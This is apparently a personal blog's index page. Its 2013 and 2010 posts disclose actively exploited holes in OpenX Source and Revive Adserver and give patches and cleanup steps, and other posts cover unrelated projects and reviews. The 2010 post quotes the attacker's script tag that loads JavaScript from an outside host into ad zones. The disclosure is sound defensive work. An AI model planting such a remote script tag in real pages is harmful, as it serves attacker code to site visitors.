18. December 2013

Zero Day Vulnerability in OpenX Source 2.8.11 and Revive Adserver 3.0.1


The current versions of the popular ad server software OpenX Source (2.8.11) and Revive Adserver (3.0.1) are vulnerable a sql injection attack which allows attackers to gain backend access. The vulnerability is actively being exploited.

The OpenX team has been informed. For Revive, I submitted a pull request with a fix.

Since Revive Adserver is the official successor to OpenX Source, I assume that there will not be an updated version of OpenX Source (after all, there wasn’t one for the last vulnerability). I have created a set of patched files which fix the vulnearbility in OpenX 2.8.11: openx-2.8.11-sql-injection-patch.zip. To patch Revive Adserver, use the files from revive-3.0.1-sql-injection-patch.zip.

I recommend applying the patches immediately, since the vulnerability is actively being exploited and has been for some time now.

Update 19.12.: The revive team confirmed the vulnerability and is working on a fixed version.
Update 20.12.: The Revive team released Revive Adserver 3.0.2 which fixes the vulnerability. If possible, I recommend to update to this version as soon as possible (including users of OpenX). Thanks a lot to the team for the quick reaction!
The Revive team also suggest a quicker temporary fix for people who cannot update right away: Remove “www/delivery/axmlrpc.php” if you do not need xmlrpc delivery (most setups use different delivery methods).
Update 3.2.2014: Removing axmlrpc.php alone does not seem to be enough to fully protect an installation. dxmlrpc.php should be removed as well. Many thanks to Péter Veres for the discovery!

By the way

If you are managing an OpenX Source or Revive Adserver installation, take a look at the OpenX Maintenance Checklist or Revive Adserver Maintenance Checklist. It helps you keeping track of frequent maintenance tasks and security checks. If you sign up for an account at Checkpanel (not required) you can easily manage this checklist. You can see when you last checked each item, set reminders, work in teams and more. Checkpanel is not limited to OpenX/Revive checklists – it helps you managing all kinds of recurring tasks (see some other samples and features).

(This article is also available in German)

11. September 2013

Zero-day Vulnerability in OpenX Source 2.8.11


The current version of the popular ad server software OpenX Source (2.8.11) is vulnerable to code injection attacks by a subset of registered users. The vulnerability is being actively exploited.

The problem can be fixed by changing line 311 in lib/OX/Extension/deliveryLimitations/DeliveryLimitations.php as follows:

$result = 'MAX_check' . ucfirst($this->group) . '_' . $this->component . "('".addslashes($data)."', '".addslashes($this->comparison)."')";

Users of OpenX should apply this fix immediately even if only trusted parties have access to the installation. The vulnerability is used in conjunction with other vulnerabilities to gain system access through highjacked accounts.

Revive Adserver (a fork of OpenX source) is vulnerable as well. I have submitted a pull request. Update: The Revive team confirmed the issue and accepted my patch on the same day.

By the way

If you are managing an OpenX ad server installation, take a look at the OpenX Maintenance Checklist. It helps you keeping track of frequent maintenance tasks and security checks. If you sign up for an account at Checkpanel (not required) you can easily manage this checklist. You can see when you last checked each item, set reminders, work in teams and more. Checkpanel is not limited to OpenX checklists – it helps you managing all kinds of recurring tasks (see some other samples and features).

(This article is also available in German)

Keywords: OpenXsecurity

28. May 2013

Checkpanel – Continuous Checklists


Checkpanel screenshot

My new project, Checkpanel, went into public beta recently. Checkpanel is a checklist application which focuses on repeating checks. Unlike traditional checklists, Checkpanel keeps track of all reported checks (marking something as working or not working). You can see who when last checked a test case and what the errors were. You can also let some checks be executed automatically and set reminders for when you would like to check something again. And much more.

I imagined it primarily for use in quality assurance of web apps, for example when you frequently want to check if a recent change broke the contact form or had similar side effects. Of course you can also use it for anything else which needs to be checked frequently.

https://checkpanel.com/ – go try it! :) I’m happy about every beta tester.

9. September 2010

Critical vulnerability in OpenX 2.8.6 & Open Flash Chart 2


There is a critical security flaw in OpenX 2.8.6 (and 2.8.5 and probably several earlier versions) which allows attackers to gain control of the webserver account and thus the adserver. The security hole is being actively exploited in the wild (as I learned the hard way). It seems that this hole is only known to attackers (in the OpenX context) at the moment, since I was not able to find any warning or other reference to it.

The problem lies in the following file:

/www/admin/plugins/videoReport/lib/ofc2/ofc_upload_image.php

The file ships with the video plugin. It is a component of Open Flash Chart 2 which is already known to be vulnerable. Basically, it allows an attacker to upload any file to the server including executables. This way, the attacker uploads a php backdoor and gains full access to the webserver account. From there he can (amongst other things) take control over the OpenX installation.

In our case, the attacker created a new admin user in the OpenX database called “root”. Interestingly, this user was not shown anywhere in the user accounts. But it did show up in the user log when he appended the following malicious script to one of our ad zones:

<script type="text/javascript" src="http://keyserveronline.com:8080/File.js"></script>

Interestingly, this vulnerability is also still present in the latest version of Open Flash Chart 2. It wouldn’t be hard to fix, but seemingly noone bothered to release a fix, yet. Me neither, since I do not need this component. A simple workaround is to delete ofc_upload_image.php. The core features of OpenX should not be affected since this file seems to be connected to reports of the video plugin and might even be unused (since it is part of a whole library). Alternatively, access to the file can be restricted via htaccess to trusted users.

I highly recommend to do this immediately, since this vulnerability is being actively exploited.

Also check for signs of a already installed backdoor. In our case, the attacker closed the vulnerability himself (presumably so that noone else can take control over his loot), so take a look at the file before deleting it and compare it with the one that ships with OpenX. If it has been edited, you probably have already been hacked and a backdoor is installed.

What to do once the server has been hacked (Update 11.9.2010)

If you think your server has been compromised, you need to make sure that you get rid of all backdoors that might have been hidden in your system. Finding a backdoor in a compromised OpenX is tricky at best, so better get rid of the original installation completely.

Re-install OpenX and apply the fix mentioned above. Do not keep any files of the old installation. Delete or archive everything that you did not install freshly from a trusted source.

Check your database. Take a look at the table ox_users and delete every entry that does not represent a trusted user. Check the prepend and append fields of all banners and zones. Remove suspicious code.

Change your passwords.

If you want to be absolutely sure, you would have to re-install the whole server because it might have been rooted. But if your server was configured savely and did not contain any vulnerabilities that can be exploited by local users, the chances of this are moderately low. Decide for yourself if you want to take this time consuming measure.

Keywords: OpenXsecurityweb development

12. July 2009

bbPress compatibility plugin for TinyMCE


I’m currently using the WYSIWYG editor TinyMCE with bbPress for a project. Unfortunately, bbPress doesn’t like it when it gets <p> tags through TinyMCE and therefore messes up the post. I have written an (extremely) simple plugin for TinyMCE which transforms <p>s into double linebreaks before posting therefore preserving compatibility. <br />s are transformed into single linebreaks.

The plugin is based on the BBCode plugin by Moxiecode Systems AB distributed together with TinyMCE, so they deserve most of the credit. I only adjusted a few replacement calls.

Currently there is one disadvantage: When you want to edit an existing post, double linebreaks are not converted back into <p>s, but into double <br />s. This usually looks just fine, but is not perfect.

Installation

Unpack the zip file into the TinyMCE plugins folder. Add “bbpress” to the list of activated plugins.
Important: Also set remove_linebreaks to false, or all linebreaks will get removed by TinyMCE.

Download

bbPress Plugin for TinyMCE 0.2
bbPress Plugin for TinyMCE 0.1

Keywords: bbPresspluginsTinyMCE

9. March 2009

Music Intersector Now With Up to Five Users


Some time ago, I created a little addon to Last.fm called Music Intersector. It shows which bands are common between the favorites of two users. As you might have noticed, Last.fm has integrated this functionality into its own system, so my old music intersector became a bit pointless.

Not anymore. I just updated it and it can now show the musical similarities between up to five users. Perfect for small parties and gatherings. :)

» Music Intersector

Unfortunately, the number of results declines extremely rapidly with more than two users. There is not much that I can do about it, since Last.fm only offers access to the top 50 artists and not the whole profile.

Keywords: intersectionlast.fmmusicrecommendation

7. February 2009

Ars Electronica Festival 2008: Photos, Impressions and Links

Ars Electronica 2008

Last year, I was at the Ars Electronica Festival in Linz, Austria. Unfortunately, I was too busy with beyond vision to post my impressions immediately, but now I’m going to make up for it. In the months that have passed, my memory of the event has faded a bit, but I’ll do my best to convey an adequate overview, with the help of tons of pictures.

All in all I was not as impressed by the festival in 2008 as I was in 2007. In part, this is because I visited the Ars Electronica Center exhebition for the first time in 2007. That exhibition is one of the greatest, but it did not change a lot from 2007 to 2008, so it was kinda “old news” for me this time.

By the way, visiting the Ars Electronica Festival on a saturday turned out not to be a problem. At first I was worried that the exhibitions would be overcrowded on the weekend, but it wasn’t much different than on the weekday the year before. The decision not to buy a day ticket was also right. I spent much less on single exhebition fees than a day ticket would have cost.

And now for the pictures…

» read on!

(This article is also available in German)

Keywords: Ars ElectronicaartAustriaexhibitionfestivalLinzphotosreport

19. January 2009

beyond vision


beyond vision

There is one project that I was working on, but never found the time to tell you about: beyond vision. It is the largest project that I have done so far and it required so much time that I didn’t have any time left to write about it. :) But in December it was finally completed, so now there is time to tell:

18 musicians, 7 huge screens. beyond vision is the fusion of music and film – not just music with visual support and not just film with film music. Together both media tell an abstract story like it would not be possible for each medium alone.

I already set up a small page full with information about this project, so I will not copy it here. If you are interested, just take a look at the following link:

» beyond vision

I am sorry that I did not have the time to mention this project earlier. I guessed that most of you are probably not from Germany so the tour dates would probably not have been very interesting for you. :) And now, at least I have some more material to show you (don’t miss the photos).

I hope I will be able to show you some more background information soon. A documentary is already in the making, so hopefully I can show you some video footage from the performances somewhen…

Keywords: beyond visionconcertinstallationmetamusicvideo

5. January 2009

My Dell UltraSharp 2709W (Review / Test)

Dell UltraSharp 2709W

Ok, “my” is not quite right in this case. Not too long ago I bought a new monitor, the Samsung SyncMaster 226bw, and i would not be that decadent to buy yet another new monitor so soon. :) I am using the Dell UltraSharp 2709W for a larger project, but I do not own it. Bold 27” screen size and a resolution of 1980×1200 come quite handy for video post processing. Too bad I’ll have to return it some day…

Specs

Screen size: 27“
Resolution: 1980×1200
Video ports: DVI, VGA, HDMI, DisplayPort, Composite Video, Component Video
Viewing angles: 178°/178° (Standard)
Contrast: 3000:1 (dynamic), Standard
Response time: 6 ms (Grey to grey), Standard
Energy consumption: 57 W (standard); 110 W (max)
Panel technology: S-PVA
Integrated speakers: no
Other integrated accessories: 4 port USB hub, 9-in-2 card reader
Price: Bought in July 2008 directly from Dell for 623 Euros. Current price: 831,81€

First Impression

A Dell UltraSharp 2709W on my desktop

After unboxing my 2709W, my first thought was „yay, biiig“. :) The UltraSharp 2709W fits just barely together with my laptop and old monitor on my desktop. The second monitor has to be turned upright to fit it besides the large 27” screen.
My personal command center. :)

Design

Visually, this large monitor does not have to hide. He is well built and has a beautifully simple design which also isn’t destroyed by pointless speakers. The material itself does not feel or look cheap, although Dell’s official product photo does not look that convincing. Fortunately, it looks better in reality.

One reason why the monitor looks so beautifully simple is that there are very few visible buttons. Only the power button is permanently emitting a blue or orange light. The other buttons for menu controls are very small LED rectangles, which stay black and mostly invisible when not in use. The only awake and shine when you approach them with your hand or finger. This is quite cool, although the technology still seems to have a few hiccups – more about this later.

Image Quality: See next page

(This article is also available in German)

Keywords: computerDelldisplayhardwareLCDmonitorreviewscreentestTFT

1. October 2008

My Name is Bruce (Movie Review)


My Name is Bruce - Poster

Plot Preview

Bruce Campbell (Bruce Campbell) is currently busy producing his newest movie, the terrific Cave Alien 2, when a young fanboy* asks for his help. He accidentally released an ancient Chinese daemon that now has set out to slaughter everyone who is related to the fanboy – coming from a small town this puts its whole population on the brink of a bloody death.

The passionate Bruce Campbell fan sees only one solution to this problem: Bruce himfels has to save the town utilizing his elite monster slaying powers which he aquired acting in various grand movies like Evil Dead. The True Fan faithfully overlooks the dramatic downfall which Bruce’s career has taken since his heydays. Neither is Fanboy irritated by the fact that his idol turns out to be the most arrogant asshole alive who couldn’t care less about his fans and annoyingly keeps hitting on fanboy’s mother (and pretty much any other female).

Thanks to some gentle persuasion involving a baseball bat and Bruce’s subsequent erroneous assumption that the whole story is just an elaborate birthday present from his manager (Ted Raimi), he agrees to pick up the fight against the daemon…

Review

My Name is Bruce: Evil Chinese Demon Spirit

As one might guess from the plot description, My Name is Bruce is not exactly a movie that is meant to be taken seriously. It is a parody – primarily on Bruce Campbell himself, but also on the movies in which he acted.

» read on!

(This article is also available in German)

Keywords: Bruce Campbellcomedyhorrormoviesreview

older articles »

Powered by WordPress

Subscribe to RSS Feed
blogoscoop